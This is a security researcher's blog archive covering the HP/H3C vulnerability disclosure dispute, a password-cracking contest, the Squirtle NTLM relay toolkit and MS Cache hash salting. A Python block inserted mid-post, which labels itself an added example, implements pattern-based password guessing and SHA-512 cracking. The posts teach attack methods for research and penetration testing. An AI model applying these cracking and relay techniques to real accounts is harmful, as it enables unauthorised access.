<br /></div>
<div style="text-align: left;">
<i>October 16, 2012</i>: HP contacts me directly asking that I not present this information at Toorcon</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>October 18, 2012</i>: Publicly state agreement to cancel the Toorcon talk</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>October 22, 2012</i>: HP discloses! What what? Why bother putting any pressure not to give the talk if you're gonna give everything out 2 days later?</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
<i>October 23, 2012</i>: So I publish.</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: left;">
</div>
</div>
Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-11043887309630534402012-10-18T13:36:00.001-07:002012-10-18T13:43:00.359-07:00On HP/H3C and Schrödinger's Disclosure<div dir="ltr" style="text-align: left;" trbidi="on">
<h2 style="text-align: left;">
Background and Timeline</h2>
Whew! The past two days have been a whirlwind of activity and I wanted to get this down before things got too crazy or out of hand.<br />
<br />
This weekend I had planned to be at Toorcon 14, my favorite security conference hands down, with a presentation entitled "<a href="http://sandiego.toorcon.org/index.php?option=com_content&task=view&id=141&Itemid=9" target="_blank">A CouNtry's Honerable n3twork deviCes</a>". The abstract:<br />
<blockquote class="tr_bq">
<span style="background-color: white; line-height: 18px;"><span style="font-family: inherit;">Thanks to FX you can now use buffer overflows on Huawei routers. Buffer overflows are cool but there are issues you have to overcome. What if there was another path which looked more like regular traffic? This talk will release details of research done in parallel to FX's against H3C/HP routers, switches, access points and firewalls. Some stats of affected Internet-accessible devices will be thrown about and updates released to Metasploit to help audit your own network. After this talk you just might be able to control a large part of the Internet in a very large CouNtry.</span></span></blockquote>
It's a culmination of research I've been doing since June, 2012 into H3C gear with stats I (and others) have collected. On August 6, not long after FX's DEFCON talk, I submitted what I had to US-CERT for them to coordinate with HP/H3C. Standard US-CERT <a href="http://www.cert.org/kb/vul_disclosure.html" target="_blank">disclosure policy is 45 days from vendor notification</a>. Unless the vendor asks and all agree to extend this.<br />
<br />
30 days later I had not heard back from US-CERT or HP/H3C so I requested an update. At this time HP/H3C requested more time at which I said "ok, you can have until Toorcon. I'm going to submit to talk and even if not selected I want to disclose this."<br />
<br />
All research and prep work for this talk was done as an individual researcher and not as part of any company. I had decided to go through US-CERT since I agree with their disclosure policy and felt this was something big and should be known and handled by them. They have a lot of experience and contacts to handle this. It's not that my employer's team isn't good, they're freaking awesome, I just didn't want to get them involved. Unfortunately.....<br />
<br />
<h3 style="text-align: left;">
Then Comes Tuesday..</h3>
I received a very cordial and apologetic voicemail and e-mail from the HP Software Security Response Team asking me not to present this Saturday. The vulnerabilities are apparently too big for them to be ready. I had clearly stated back in September my intention to provide mitigation techniques so that their customers would not be left in the dark after the presentation was done. I'm not a bad person, really.. Honest!<br />
<br />
While this was understood they still felt the information was too much of a risk and again requested I delay the talk until they could be ready.<br />
<br />
I'm guessing somebody woke up on Tuesday morning and went "Oh hell, is Toorcon this Saturday?" but you can speculate as you see fit. I can't stop you.<br />
<br />
Some dates were floated around. HP understands the urgency and also knows that ZDI, their own disclosure group, has a 6-month policy to "<a href="http://dvlabs.tippingpoint.com/blog/2010/08/03/zdi-disclosure-changes" target="_blank">disclose no matter what.</a>" So the information will come out, just not right now by me or US-CERT.<br />
<br />
Others strongly suggested to me that I agree with this delay. If you're familiar with the 7-layer OSI stack (similar to but not exactly like the 7-layer Taco Bell burrito) then you know there are 2 additional layers atop it. Politics and Money.<br />
<br />
Feel free to speculate as you see fit. I can't stop you.<br />
<br />
<h3 style="text-align: left;">
So Are You At Risk?</h3>
If you own and use H3C or Huawei equipment then of course you are. I have information of serious vulnerabilities and you don't. Nanny nanny boo boo. But I believe in Full and Responsible disclosure, which is why I went through US-CERT. It's just that this information has serious industry-wide implications that HP isn't ready to release.<br />
<br />
Can others figure out what I know? Certainly they could. Am I going to tell anyone or give hints? No, I cannot. There is this bag with an angry cat in it that wants to come out. Or it may not be a cat. It's Schrödinger's Disclosure! You just won't know until it's opened.<br />
<br />
This is what's tough about Full and Responsible Disclosure and why you should listen when dates and intentions are stated.<br />
<br />
If you own and use H3C or Huawei equipment then you already know you're at a serious risk thanks to FX's DEFCON talk. If you value your network and its data then you should already have taken steps to protect it. These protections will most likely keep you safe from me as well.<br />
<br />
However I know there are guys and girls out there that can find the same stuff I did. Please be respectful of me and HP by not talking about it if you do. Do feel free to talk to me and we'll commiserate together over our shared information.<br />
<br />
<h3 style="text-align: left;">
Contacting HP</h3>
<div>
If you have any questions in relation to this case, I encourage you to contact HP's PR contact <a href="mailto:samantha.singh@hp.com" target="_blank">Samantha Singh</a></div>
<div>
<br /></div>
<h3 style="text-align: left;">
Disclaimer</h3>
<div>
The content herein consists of my own personal opinions and not those of my employer.</div>
</div>
Anonymoushttp://www.blogger.com/profile/04585230141295452096noreply@blogger.com2tag:blogger.com,1999:blog-28687371.post-76744606865147974802011-08-09T07:16:00.000-07:002011-08-09T07:16:03.854-07:00The contest is overKorelogic's <a href="http://contest.korelogic.com/">Crack Me If You Can</a> contest at Defcon is officially over. Team <a href="https://contest.korelogic.com/stats_EC952A038CB3ECB4.html">Not Appearing At Defcon</a> scored decently given it was just me, two machines and not a lot of focused time.<br />
<br />
The top teams scores fully show that given enough resources and dedication today's password hashes can and will be broken. Congrats to the top four teams: <a href="https://contest.korelogic.com/stats_8D65BF65887D65A9.html">Hashcat</a>, <a href="https://contest.korelogic.com/stats_CCDE2FAB9599C0A6.html">InsidePro</a>, <a href="https://contest.korelogic.com/stats_7D47E99A316E29D7.html">john-users</a> and <a href="https://contest.korelogic.com/stats_889DCCAD7B08FD12.html">bindshell-dot-nl</a>. Reading your write-ups will be fun!<br />
<br />
I had a few goals I wanted to achieve while participating in the contest. I knew I wouldn't score high or often due to outside commitments. I mostly wanted to: <br />
<ul><li>Stretch out the environment we had built up for penetration tests</li>
<li>Try not to get sucked into trying for bigger scoring points and see how many overall hash types respond in the environment (failing sometimes to stick to this rule - damn competitive natures!)</li>
<li> Gain more experience with Hashcat's tools and closing some of my knowledge gaps with it</li>
<li>More real-world experience with using John The Ripper's modes.</li>
</ul>Yes, it would be possible to build your own password list, hash it and such, but there's something about having a third-party source. You have no clue what was used so you're starting out completely blind! <br />
Overall I felt the contest was a good representation of real-life password cracking experience with a few minor issues in my opinion:<br />
<ul><li>In a real world penetration test you typically receive bundles of hashes at a time. Usually a few Windows systems with local administrator and one or two potentially useful accounts. Then as the days progress you start owning larger and larger systems with more and more passwords (mssql, oracle, windows servers, etc). I'm not really sure how they could incorporate that into a 48 hour contest but it would be cool.</li>
<li>Individuals are severely outclassed by teams, but that's entirely ok. The contest was designed as a team-based system. Obviously those who had the resources to work together and develop their own tools have a huge step-up. The top three teams represented three different cracking toolsets.</li>
<li>The mssql/mssql05 debacle was annoying but glad it was cleared up. The problem with mssql hashes is that they crack in both formats so you really need to know your source. I had achieved a high number of mssql05 hashes but when they didn't point score I switched to mssql, which was incorrect. Quite a bit of wasted CPU time.</li>
</ul>Some of the things I liked about the contest:<br />
<ul><li> For those of us who are not hard-core shellcoders, this gave us something fun to play as part of Defcon instead of having our asses handed to us at CTF. The downside still is if you're at Defcon and you're in a contest you don't really get to enjoy Defcon. :)</li>
<li>The challenges were a nice touch - zip, pdf, rar and doc files with extra hashes in them to crack! I wasn't expecting them so I didn't spend too many cycles on them. Something to note for our environment...</li>
<li>A lot of hard work went into making this contest and from my vantage point it seemed to run pretty smoothly. Kudos to Korelogic!</li>
<li>Separating the hashes into their respective files was really helpful for writing scripts. Saved a bunch of time compared to the prior year's huge textfile of hashes. </li>
<li>The contest wasn't just about brute force strength, however having an arsenal of systems/people or an amazing GPU coder in your pocket helps. I heard that atom, the main coder for hashcat, wrote a GPU implementation of mscash2 in 8 hours. A serious leg up against everyone else given 16,000 points per DCC2 crack.</li>
<li>Wordlists helped but spotting patterns early on and adapting helped, as expected. A system I wasn't really able to exploit due to limited personal time.</li>
</ul>I look forward to the write-ups from the other teams. Big thanks to Solar Designer for making <a href="http://openwall.com/john/">John The Ripper</a> and the rest of the team that have been working to make <a href="http://openwall.info/wiki/john/patches">tremendous improvements</a> to it. It's been the tool-to-use for a number of years and continues to shine. Huge thanks to <a href="http://www.korelogic.com/">KoreLogic</a> for their second year of designing and working the contest.<br />
<br />
I look forward to next year's contest and the overall report!<br />
<br />
Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-87096447058659333552011-08-06T00:32:00.000-07:002011-08-06T00:32:12.181-07:00Day 1 wrap-up, Crack me if you canUntil I finalise my thoughts more this will probably be the last update for the contest. It's pretty clear that one person with a few small resources can't crack as fast as an army of people that may or may not have a <a href="http://ob-security.info/?p=274">mega-setup</a> at their disposal.<br />
<br />
I don't think I scored too poorly given that I was an individual with two systems at my disposal. I've learned a lot and that will help in the long run.<br />
<br />
The contest this year includes some heavy point-setting password protected zip, rar and word documents. I'm sure they are some permutation of already cracked passwords, maybe I'll get to those later. There are too many things to do at once for this contest that you really need to put together a good team.<br />
<br />
My score so far?<br />
<br />
<table border="1"><tbody>
<tr><th>points</th><th>cracks</th><th>team id</th><th>team name</th></tr>
<tr><td>80199</td><td>16094</td><td>EC952A038CB3ECB4</td><td>not appearing at defcon</td></tr>
</tbody></table><br />
<table border="1"><tbody>
<tr><th>points</th><th>cracks</th><th>points per crack</th><th>hash type</th></tr>
<tr><td>5000</td><td>1</td><td>5000</td><td>bf</td></tr>
<tr><td>5000</td><td>5</td><td>1000</td><td>md5</td></tr>
<tr><td>200</td><td>1</td><td>200</td><td>bsdi</td></tr>
<tr><td>13662</td><td>759</td><td>18</td><td>raw-sha512</td></tr>
<tr><td>11640</td><td>776</td><td>15</td><td>mysql-sha1</td></tr>
<tr><td>7813</td><td>601</td><td>13</td><td>md5_gen(23)</td></tr>
<tr><td>6492</td><td>541</td><td>12</td><td>md5_gen(22)</td></tr>
<tr><td>8200</td><td>820</td><td>10</td><td>des</td></tr>
<tr><td>176</td><td>22</td><td>8</td><td>md5_gen(12)</td></tr>
<tr><td>280</td><td>40</td><td>7</td><td>oracle11</td></tr>
<tr><td>469</td><td>67</td><td>7</td><td>mssql</td></tr>
<tr><td>343</td><td>49</td><td>7</td><td>ssha</td></tr>
<tr><td>636</td><td>106</td><td>6</td><td>md5_gen(16)</td></tr>
<tr><td>7476</td><td>1246</td><td>6</td><td>raw-sha1</td></tr>
<tr><td>2628</td><td>876</td><td>3</td><td>phps</td></tr>
<tr><td>4221</td><td>4221</td><td>1</td><td>md5_gen(0)</td></tr>
<tr><td>5963</td><td>5963</td><td>1</td><td>nt</td></tr>
</tbody></table><br />
I really should have more single points up there but it's such a decision battle. Spend the cycles cracking some of the slower, higher point hashes or blast through the faster, lower point ones. Oh well, will pick up more cracking tomorrow if time permits, and it probably won't.<br />Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-56917713403740859012011-08-05T12:00:00.000-07:002011-08-05T12:00:51.970-07:00Holy crap, one against manyThe scores for this year's KoreLogic <a href="https://contest.korelogic.com/stats.html">Crack Me If You Can</a> contest are up and it appears that teams with multiple people and systems have a slight advantage....<br />
<br />
The top 4 teams:<br />
<pre>74766 8D65BF65887D65A9 Hashcat
50155 CCDE2FAB9599C0A6 Insidepro team 2011
45187 7D47E99A316E29D7 john-users
24687 889DCCAD7B08FD12 bindshell-dot-nl</pre><br />
Where am I in all of this?<br />
<pre>4447 EC952A038CB3ECB4</pre><br />
That's about what I expected. I'm only one person with a small spattering of machines at my disposal. With 121,614 hashes to crack of 20 different hash types you have to be smart. Brute force will only get you so far and so far that's mostly what I've been doing: finding the commonality amongst the easy-to-crack so, time permitting, the bigger scoring hashes can be cracked.<br />
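The loop described in this post (crack the cheap hash types first, learn the shape of what falls, then aim that shape at the higher-value ones) as an added, runnable example; it is not part of the post and not code from John the Ripper or KoreLogic. The cracked plaintexts, the base wordlist and the raw-SHA512 targets are constructed for the example, and the mask notation (?u ?l ?d ?s) is hashcat's.

```python
"""Learn the shape of what has already cracked, then aim it at the expensive hashes."""
import hashlib
import re
import string
from collections import Counter

# Constructed sample: plaintexts as `john --show` would reveal them for the cheap hash
# types (NT, raw-MD5). Invented for this example, not contest data.
CRACKED = [
    "Summer11!", "Winter09!", "Monkey12!", "Dragon10!", "Spring11!",
    "welcome1", "baseball1", "letmein1", "qwerty12", "Jennifer1",
    "Michael2", "Jessica11!",
]

# Constructed stand-in for the big wordlist the post feeds to JtR.
BASE_WORDS = ["autumn", "tiger", "shadow", "master", "hunter", "sunshine"]


def mask_of(plaintext: str) -> str:
    """hashcat-style mask: ?u upper, ?l lower, ?d digit, ?s anything else."""
    def cls(ch):
        if ch in string.ascii_uppercase:
            return "?u"
        if ch in string.ascii_lowercase:
            return "?l"
        if ch in string.digits:
            return "?d"
        return "?s"
    return "".join(cls(c) for c in plaintext)


def mask_stats(plaintexts):
    """Masks ranked by how many cracked plaintexts share them (the PACK statsgen idea)."""
    return Counter(mask_of(p) for p in plaintexts).most_common()


def learn_shape(plaintexts):
    """Split each plaintext into an alphabetic stem and a non-alphabetic suffix and count
    how the stem is cased and which suffixes follow it."""
    casings, suffixes = Counter(), Counter()
    for p in plaintexts:
        m = re.fullmatch(r"([A-Za-z]+)([^A-Za-z]*)", p)
        if not m:
            continue
        stem, suffix = m.groups()
        casings["title" if stem.istitle() else "lower" if stem.islower() else "other"] += 1
        if suffix:
            suffixes[suffix] += 1
    return casings, suffixes


def candidates(base_words, casings, suffixes, top_suffixes=6):
    """Guesses in priority order: commonest casing first, each base word, commonest suffixes."""
    casefn = {"title": str.title, "lower": str.lower, "other": str.upper}
    for casing, _ in casings.most_common():
        for word in base_words:
            for suffix, _ in suffixes.most_common(top_suffixes):
                yield casefn[casing](word) + suffix


def crack_sha512(targets, guesses) -> dict:
    """Return {hexdigest: plaintext} for every raw-SHA512 target a guess reproduces."""
    want = set(targets)
    found = {}
    for guess in guesses:
        digest = hashlib.sha512(guess.encode()).hexdigest()
        if digest in want and digest not in found:
            found[digest] = guess
            if len(found) == len(want):
                break
    return found


# Constructed higher-value targets (raw-sha512 is worth 18 points a crack in the table
# above): SHA-512 of two plaintexts that follow the learned shape.
TARGETS = [hashlib.sha512(p.encode()).hexdigest() for p in ("Autumn11!", "tiger1")]


def run() -> dict:
    casings, suffixes = learn_shape(CRACKED)
    return crack_sha512(TARGETS, candidates(BASE_WORDS, casings, suffixes))


if __name__ == "__main__":
    for mask, n in mask_stats(CRACKED)[:3]:
        print(f"{n:3d}  {mask}")
    print(run())
```

The candidate generator is deliberately ordered: the casing and suffixes that covered the most cheap cracks are tried first, which is the whole point when the expensive formats only give you a few thousand guesses a second.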
<br />
<br />
Honestly I only have a few hours of free time left so I'll probably pick a few high scoring hash types and let the permutation of the wordlist run for a bit.<br />Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-88100061354021812062011-08-05T08:45:00.000-07:002011-08-05T08:45:03.848-07:00KoreLogic 2011 Crack Me If You CanDue to a lot of family-type things happening around the BlackHat/Defcon/CCC dates I have been unable to attend. Usually it's work that precludes the "having fun in 120 degree Las Vegas weather."<br />
<br />
Thankfully KoreLogic has given non-attendees the chance to play in their "<a href="https://contest.korelogic.com/">Crack Me If You Can</a>" game for Defcon! Hooray! 48 hours of unadulterated power consuming, hash generating, text file management, pgp encrypting and general usage of unused computing cycles!<br />
<br />
This year I decided to devote a few hours to this contest while the wife and baby sleep. I'll be writing some updates as I get some time on how things are going. It's now been a little over an hour since I started so here's where things stand.<br />
<br />
<b><u>On Your Mark</u></b><br />
Pre-registration involved generating a PGP key (if you didn't already have one) and sending it off to KoreLogic's scoring server for verification. This was easy if you've spent any time doing encrypted communication exchanges.<br />
<br />
<b><u>Get Set</u></b><br />
While I waited for the contest to start I made sure I had all my tools and systems ready. This would be the chance to help prove out the expenditure of NVidia GTX580 cards, high-end CPUs, RAID disk space, etc. Since I'm running in an even shorter timeframe (and smaller team size... of one!) early preparation was key.<br />
<br />
Tools I planned on using:<br />
<br />
<ul><li><a href="http://openwall.com/john/">John the Ripper</a>, latest jumbo patches and GPU patches if time and code permitted</li>
<li>The <a href="http://hashcat.net/">oclHashCat</a> suite</li>
<li>Misc rainbowtables collected over the years</li>
<li>Misc wordlists collected over the years</li>
</ul><div><b><u>GO!</u></b></div><div>Molly wakes me up at 5:50am on Friday morning for her regular feeding... 20 minutes of extra sleep! I check my e-mail and am excited to see the encrypted contest e-mails in my inbox. A quick pgp decryption and the URLs to download are shown. Hooray!</div><div><br />
</div><div>Oops, based on the CMIYC twitter feed they had generated some weak hashes. Use the two files instead of the first one. Ok!</div><div><br />
</div><div>Down they come with wget.... Hmm, zip files. No problem! Take a peek with 'unzip -v' and the contents look pretty good. Time to get rolling...</div><pre>~/korelogic-2011/test$ unzip ../2011-CrackMeIfYouCan_part1.zip 
Archive:  ../2011-CrackMeIfYouCan_part1.zip
   creating: contest_tree/challenge1/
[../2011-CrackMeIfYouCan_part1.zip] contest_tree/challenge1/challenge1.zip password: </pre>Oh. Of course it's going to be password protected. But it's pretty easy to guess if you take a step back and think about it.<br />
<br />
<b><u>Two hours in...</u></b><br />
<blockquote><blockquote>4066 password hashes cracked, 123780 left</blockquote></blockquote>A long way to go still... Right now I'm basically not caring about the scoring points and going after "low-hanging passwords" using a very large dictionary, JTR's stock rules and patience. Some high scoring hashes may be cracking, I don't really know right now.. Time to feed the baby again.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-59486032663329925002009-02-12T11:08:00.001-08:002009-02-12T11:13:24.858-08:00Where's grutz?I've been very busy with a number of things and haven't been able to focus on fun things to share. Work work work work work! This year MacWorld did finally manage to fix their issue so no free platinum passes using the same, tired exploit! <a href="http://code.google.com/p/squirtle/">Squirtle</a> has been put on the backburner for now and valentines day is right around the corner. Too bad I'm not Cupid... and I'm filled with hatred and rage!<br /><br /><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/J4UOiHu3RMU&hl=en&fs=1"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/J4UOiHu3RMU&hl=en&fs=1" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object><br /><br />Here's to hoping your 2009 is a great one. 
Happy Chinese New Year!<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-41479495429244197612008-11-15T13:42:00.000-08:002008-11-15T13:57:30.311-08:00Squirtle and MS08-068HD Moore already did some <a href="http://blog.metasploit.com/2008/11/ms08-067-metasploit-and-smb-relay.html">great analysis</a> on how the MS08-068 patch affected the SMB Relay attacks within Metasploit. The answer?<br /><br />You can't attack the source workstation/server if MS08-068 has been applied.<br /><br />This ONLY affects Squirtle if your evil agent attempts to communicate back to the victim. 
It should not impact attacking their IMAP, HTTP or File/Print servers.<br /><br />As always the goal of Squirtle is to permit others to extend their own tools to permit the use of authentication requests from controlled browsers and at your own time or when the right users click on your evil link!<br /><br />Have fun with the latest updates and thanks to Natron for pointing me towards HD's analysis.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-32745385523982765752008-11-14T09:38:00.001-08:002008-11-14T10:11:42.324-08:00Squirtle Updates: IMAP, Metasploit integration completeI just gave a talk to everyone here at <a href="https://www.deepsec.net/">DeepSec 08</a>. Other than the weather being a bit cold and wet Vienna is awesome. Everyone seems happy to be at this conference and to share and network with each other. It's always fun giving the Squirtle talk to new audiences and see their eyes light up as they start to get why this attack matters to their environments or how they could use it on a client's penetration test.<br /><br />With the conclusion of this talk I'm happy to announce that two new evil agent updates have been completed!<br /><ul><li>IMAP Mirroring! Download a victim's entire IMAP directory! Use social engineering, have the help desk e-mail them a new password!<br /><li>Metasploit integration! 
SMB Relay an enterprise's server farm with Squirtle!<br /></ul>Get the latest updates from the Squirtle SVN at <a href="http://squirtle.googlecode.com/">http://squirtle.googlecode.com/</a>. The MSF update is a patch against the as-of-writing-this MSF 3.2-current SVN code. If things change I'll try to keep it updated. Not sure if this is "MSF-code worthy" as it uses the JSON ruby gem vs processing the result manually. I had the library installed, didn't want to write my own parser. :P<br /><br />On Nov 11th MSRC <a href="http://blogs.technet.com/msrc/archive/2008/11/11/ms08-068-and-smbrelay.aspx">posted</a> some information on MS08-068 implementing some changes to the NTLM protocol to neuter the SMB Relay attack and possibly (but not mentioned) Squirtle as well. I haven't had a chance to play with yet as I didn't want to possibly spoil the live demos so close to DeepSec. It's nearly time to spend the evening at <a href="http://www.metalab.at/">Metalab</a> so more information as it develops (I promise!)<br /><br />Big thanks to everyone here at DeepSec for coordinating this one-of-kind conference. Vienna is such a beautiful place to visit, I only wish it would be earlier in the season when it's not so cold and dreary outside. I hope to come next year for DeepSec 09!<br /><br />Also, look for my ugly mug to make an appearance on <a href="http://www.net-security.org/">Help Net Security</a> soon. It's a brief plea on using Squirtle and hopefully my excitement over reaching more people isn't too transparent. 
:)<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com5tag:blogger.com,1999:blog-28687371.post-27200752856960389542008-09-02T15:24:00.000-07:002008-09-02T15:40:02.922-07:00Upcoming Speaking GigsTying a neat little bow to my NTLM/HTTP research I'll be presenting "One XSS to Rule The Enterprise" at <a href="http://sandiego.toorcon.org/">ToorCon X</a> the end of September and "NTLM SSO Weaknesses" at <a href="https://deepsec.net/">DeepSec</a> in November. Both talks will show off the <a href="http://code.google.com/p/squirtle">Squirtle Attack Toolkit</a>. Hopefully I'll have some of the updates I didn't get into the DefCon release ready by ToorCon!<br /><br />When friends ask "should I go to Defcon?" I always respond "Hey, check out ToorCon. It's in a nicer climate!" Vegas in July? Pfft, San Diego in September! One of the best conventions out there, period. 
Just check out the <a href="http://sandiego.toorcon.org/content/section/3/9/">conference lineup</a>!<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com0tag:blogger.com,1999:blog-28687371.post-3746266630890564422008-08-12T15:51:00.000-07:002008-08-12T16:09:41.653-07:00Passing The Dutchie @ Defcon 16Like many things with this blog, I don't prioritize it above things like hanging out with my girlfriend, going to work, sleeping, breaking my iPhone, losing all my Defcon pictures, etc.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://grutz.jingojango.net/images/That_evil_Squirtle.png"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://grutz.jingojango.net/images/That_evil_Squirtle.png" border="0" alt="" /></a>Last weekend was Defcon 16. I had a really great time speaking to a packed house on the death of NTLM. <a href="http://grutz.jingojango.net/presentations/NTLM%20is%20Dead%20-%20DefCon%2016.pdf">Slides</a>, <a href="http://grutz.jingojango.net/presentations/NTLM%20is%20Dead%20-%20DefCon%2016.mov">slide video</a> and <a href="http://code.google.com/p/squirtle">source code to Squirtle</a> are now available for your pleasure. I'll be doing some more work and documentation on Squirtle shortly.<br /><br />A few quick changes were made to the slide deck from what was presented (and the slides on the CD are waaaaaay something different :). 
Mostly added NTLM Signing as a mitigation and correctly stating that JoMoKun did the Samba Pass-The-Hash modifications. Sorry!<br /><br />More updates coming.<div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-76206485691864633812008-08-07T08:08:00.000-07:002008-08-07T08:17:31.997-07:00NTLM is Dead: Defcon 16<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhInlngoF_DxfOnIPldR0b0cu_cjBm_pVBY4al3m_TKDJehHS9yywN-JrjRuaAszVkWzcf0jNYUGqDT0BVfbjd0MTSSR5wkLqyRjZGIUvBUBgT5exfcALsw9wtxPo3izS52tUJslw/s1600-h/NTLM_title.png"><img style="display:block; margin:0px auto 10px; text-align:center;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhInlngoF_DxfOnIPldR0b0cu_cjBm_pVBY4al3m_TKDJehHS9yywN-JrjRuaAszVkWzcf0jNYUGqDT0BVfbjd0MTSSR5wkLqyRjZGIUvBUBgT5exfcALsw9wtxPo3izS52tUJslw/s400/NTLM_title.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5231794561207673986" /></a><br />Friday, August 8th @ 2pm. Come learn how to own an enterprise with one XSS!<br /><br /><a href="http://grutz.jingojango.net/exploits/squirtle/">Slides</a> and other material will be on-line after Defcon. 
Source code available <a href="http://code.google.com/p/squirtle/">here</a><div class="blogger-post-footer"><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml"><img src="http://www.feedburner.com/fb/images/pub/feed-icon32x32.png" alt="" style="border:0"/></a><a href="http://feeds.feedburner.com/grutztopia" title="Subscribe to my feed" rel="alternate" type="application/rss+xml">Subscribe in a reader</a></div>Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com1tag:blogger.com,1999:blog-28687371.post-8694233198762001942008-07-30T20:02:00.000-07:002008-07-30T21:04:44.758-07:00Attacking NTLMDefcon presentation times have been confirmed for a few weeks now and I've been slaving away at my slides and source code for a while now. I gave a pre-talk at work the other day and have decided to redo a lot of the slides. That's what you get when you ask for slides 38 days before the presentation. :)<br /><br />Of course I'll have the full slides on-line after the conference but if you're coming to Defcon please come to my talk: Friday, August 8th at 2pm.<br /><br />What exactly will I be talking about? Well, it's really difficult to describe succinctly but the best way I can say it is: An XSS inside your company == Total Domain Ownage.<br /><br /><a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://grutz.jingojango.net/images/ntlm2.jpg"><img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;width: 200px;" src="http://grutz.jingojango.net/images/ntlm2.jpg" border="0" alt="" /></a><br /><br />Was that a scoff I just heard under your breath? Honestly, I'm not lying here. 
Because of the way NTLM and Windows Single Sign-On works your run-of-the-mill cross site scripting error on an internal resource can DEVASTATE your enterprise!<br /><br />Stay tuned.<br />Kurt Grutzmacherhttp://www.blogger.com/profile/07238514087343942495noreply@blogger.com2tag:blogger.com,1999:blog-28687371.post-57203158941237659492008-06-13T15:44:00.000-07:002008-06-13T16:52:39.841-07:00MS Cache and John the RipperChalk this one up to knowledge remembered, forgotten, and then remembered again!<br /><br />Lately I have been playing with using our MPI John the Ripper cluster to increase the crack rate of MS Cache passwords. With a very long list of passwords, some of which I knew would be easy to crack, I set out and started the process on 20 nodes. After a few days and ZERO cracks I started to wonder what the hell was going on.<br /><br />The answer is one I knew many years ago when <a href="http://www.securiteam.com/tools/5JP0I2KFPA.html">cachedump</a> first came on the scene. The MS Cache hash (Domain Cached Credentials) is salted with the <b>lower-case username</b>: Windows lowercases the account name before feeding it into the hash. Because some of the cachedump tools take the username out of the registry as-is and don't convert the case you'll run JTR for days with an invalid salt. 
